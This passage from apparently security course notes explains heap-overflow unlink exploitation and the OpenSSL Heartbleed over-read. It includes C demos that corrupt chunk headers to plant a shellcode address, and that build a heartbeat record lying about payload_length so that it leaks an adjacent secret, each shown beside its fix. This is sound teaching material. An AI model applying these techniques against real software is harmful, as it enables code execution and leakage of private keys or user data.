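    struct chunk *fd;     /* forward link: next free chunk */
    struct chunk *bk;     /* backward link: previous free chunk */
    char data[32];        /* user area; writing past it lands on the next header */
} chunk;

/* Classic unlink, done when a freed chunk is merged with a free neighbour:
 * two pointer writes whose targets come from the chunk's own header. */
void unlink_unchecked(chunk *p)
{
    chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;    /* *(fd + offsetof(chunk, bk)) = bk */
    bk->fd = fd;    /* *(bk + offsetof(chunk, fd)) = fd */
}

/* Hardened unlink: both neighbours must still point back at p. */
int unlink_checked(chunk *p)
{
    if (p->fd->bk != p || p->bk->fd != p)
        return -1;  /* "corrupted double-linked list" */
    unlink_unchecked(p);
    return 0;
}

/* The victim: a slot holding a code address (think: a saved return). */
static uintptr_t saved_return;
/* Where the attacker's code would sit; a data array here, never run. */
static uintptr_t shellcode[8];

uintptr_t injected_address(void) { return (uintptr_t)shellcode; }

/* What the overflow writes into the NEXT chunk's header: fd aimed so that
 * fd->bk is the victim slot, bk holding the value to plant there. */
void corrupt_header(chunk *next, uintptr_t victim, uintptr_t inject)
{
    next->fd = (chunk *)(victim - offsetof(chunk, bk));
    next->bk = (chunk *)inject;
}

/* Run the scenario and report what is left in the victim slot. */
uintptr_t demo(int use_checked)
{
    static chunk a, b, c;
    saved_return = 0x08048abc;             /* assumed legitimate return address */
    a.fd = &b; a.bk = &c;                  /* healthy circular free list a<->b<->c */
    b.fd = &c; b.bk = &a;
    c.fd = &a; c.bk = &b;
    corrupt_header(&b, (uintptr_t)&saved_return, injected_address());
    if (use_checked)
        unlink_checked(&b);                /* refuses: neighbours do not point back */
    else
        unlink_unchecked(&b);              /* plants the shellcode address in saved_return */
    return saved_return;
}

int main(void)
{
    printf("unchecked: 0x%lx (shellcode at 0x%lx)\n",
           (unsigned long)demo(0), (unsigned long)injected_address());
    printf("checked:   0x%lx\n", (unsigned long)demo(1));
    return 0;
}
```

Note the second write in unlink_unchecked: it stores fd into the first word of shellcode. That clobbering is inherent to the technique, which is why real heap exploits of this kind began their code with a short jump over the first few bytes.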
Memory attack 2: heap overflow
Forms another mechanism for vectoring to code...Heap attacks have been done on both the Java and OS heaps.
An example heap attack was found in the Microsoft GDI+ WMF heapoverflow attack (2009). There were exploits of this in the wild.
According to Symantec, in the Microsoft GDI+ WMF attack:
A remote code execution vulnerability exists in the way that GDI+allocates buffer size when handling WMF image files.The vulnerability could allow remote code execution if a useropens a specially crafted WMF image file or browses to a Website that contains specially crafted content.An attacker who successfully exploited this vulnerability could takecomplete control of an affected system.An attacker could then install programs; view, change, or deletedata; or create new accounts with full user rights.Users whose accounts are configured to have fewer user rights onthe system could be less impacted than users who operate withadministrative user rights.
OpenSSL Heartbeat

What is a heartbeat in openssl?
A heartbeat is a recent (February 2012) extension to TLS, to allow a client to check if a TLS server is still alive (rather than tearing down a connection and renegotiating). It is described in https://tools.ietf.org/html/rfc6520.
The general idea is that clients can request a heartbeat, sending a heartbeat_request message with this structure:

    struct {
        HeartbeatMessageType type;
        uint16 payload_length;
        opaque payload[payload_length];
        ...
    } HeartbeatMessage;

The server will send back the payload in a matching heartbeat_response.

What is the issue?
What if the client lied about the payload_length?

OpenSSL Heartbeat, Hearts bleed
[Figure: request and response different... the request carries a small payload but claims a large payload_length; the response contains that many bytes.]
OpenSSL Heartbeat

Original openssl-1.0.1f/ssl/d1_both.c:

    ...
    /* Read type and payload length first */
    hbtype = *p++;
    n2s(p, payload);
    pl = p;
    ...

The original source gets the type from the record that p points to, and puts it into hbtype. It then copies the next two bytes into the variable payload. This is the length of the payload, and is taken without checking it against the length of the record actually received. The variable pl is the actual payload, which is later echoed, using the length value without any more checking, so up to 65535 bytes of whatever follows the record in the server's memory are sent back to the client.

Fixed openssl-1.0.1g/ssl/d1_both.c:

    ...
    /* Read type and payload length first */
    hbtype = *p++;
    n2s(p, payload);
    if (1 + 2 + payload + 16 > s->s3->rrec.length)
        return 0; /* silently discard */
    pl = p;
    ...

(There is a little more, but that is the general idea: the 1 byte of type, 2 bytes of length, the claimed payload and the 16 bytes of minimum padding must all fit inside the record that was actually received.)
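An added example, not OpenSSL's code: a heartbeat message handler with the 1.0.1f logic beside the 1.0.1g check, run over a constructed record that lies about payload_length. The memory array stands in for the server's heap: the record sits at the front and a (constructed) secret sits right behind it, as a private key or another client's data might. Function names are mine; the 16 is the minimum padding from RFC 6520, as in the fixed code above.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define TLS1_HB_REQUEST 1
#define HB_PADDING      16

/* Everything the payload pointer can reach in this demo. */
static uint8_t memory[256];
static const char SECRET[] = "SECRET-PRIVATE-KEY-BYTES";   /* constructed */

/* Build a HeartbeatMessage with a possibly dishonest payload_length.
 * Returns the true length of the record, as the record layer sees it. */
size_t make_record(uint8_t *out, uint16_t claimed_len, const char *payload)
{
    size_t real = strlen(payload);
    out[0] = TLS1_HB_REQUEST;
    out[1] = (uint8_t)(claimed_len >> 8);    /* uint16 payload_length, big endian */
    out[2] = (uint8_t)(claimed_len & 0xff);
    memcpy(out + 3, payload, real);
    memset(out + 3 + real, 0, HB_PADDING);
    return 1 + 2 + real + HB_PADDING;
}

/* 1.0.1f logic: believe payload_length and echo that many bytes from pl.
 * resp_cap only keeps this demo inside its own arrays; the real code had
 * no such limit. */
size_t heartbeat_vulnerable(const uint8_t *p, size_t rrec_length,
                            uint8_t *resp, size_t resp_cap)
{
    uint8_t hbtype = *p++;
    uint16_t payload = (uint16_t)((p[0] << 8) | p[1]);   /* n2s(p, payload) */
    p += 2;
    const uint8_t *pl = p;
    (void)rrec_length;                        /* never compared: the bug */
    if (hbtype != TLS1_HB_REQUEST) return 0;
    size_t n = payload < resp_cap ? payload : resp_cap;
    memcpy(resp, pl, n);                      /* copies whatever follows the record */
    return n;
}

/* 1.0.1g logic: type + length + payload + minimum padding must fit. */
size_t heartbeat_fixed(const uint8_t *p, size_t rrec_length,
                       uint8_t *resp, size_t resp_cap)
{
    uint8_t hbtype = *p++;
    uint16_t payload = (uint16_t)((p[0] << 8) | p[1]);
    p += 2;
    if (1 + 2 + (size_t)payload + HB_PADDING > rrec_length)
        return 0;                             /* silently discard */
    const uint8_t *pl = p;
    if (hbtype != TLS1_HB_REQUEST || payload > resp_cap) return 0;
    memcpy(resp, pl, payload);
    return payload;
}

/* Did the secret behind the record end up in the response? */
int leaks_secret(const uint8_t *resp, size_t n)
{
    size_t slen = sizeof SECRET - 1;
    for (size_t i = 0; i + slen <= n; i++)
        if (memcmp(resp + i, SECRET, slen) == 0) return 1;
    return 0;
}

/* A two-byte payload "hi" advertised as 200 bytes; returns 1 if leaked. */
int scenario(int use_fixed)
{
    uint8_t resp[256];
    memset(memory, 0, sizeof memory);
    size_t len = make_record(memory, 200, "hi");
    memcpy(memory + len, SECRET, sizeof SECRET);        /* the heap neighbour */
    size_t n = use_fixed ? heartbeat_fixed(memory, len, resp, 200)
                         : heartbeat_vulnerable(memory, len, resp, 200);
    return leaks_secret(resp, n);
}

int main(void)
{
    printf("1.0.1f leaks secret: %d\n", scenario(0));
    printf("1.0.1g leaks secret: %d\n", scenario(1));
    return 0;
}
```

The general lesson is the one from the buffer-overflow section, with the direction reversed: a length that arrives from the network is attacker-controlled data, and it has to be checked against a length the program knows to be true (here rrec.length) before it is used for any copy, whether that copy writes into a buffer or, as here, reads out of one.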
Summary...
The attacksOverflow attacks can be used to execute arbitrary code (that is, codethat is picked by the attacker).
This is obviously extremely dangerous.
In the case of applications or systems you build or design, the importantthing is to make sure that buffers cannot be overwritten.
However, it may be that the attacked buffer or heap is part of the OS,and not exactly your responsibility.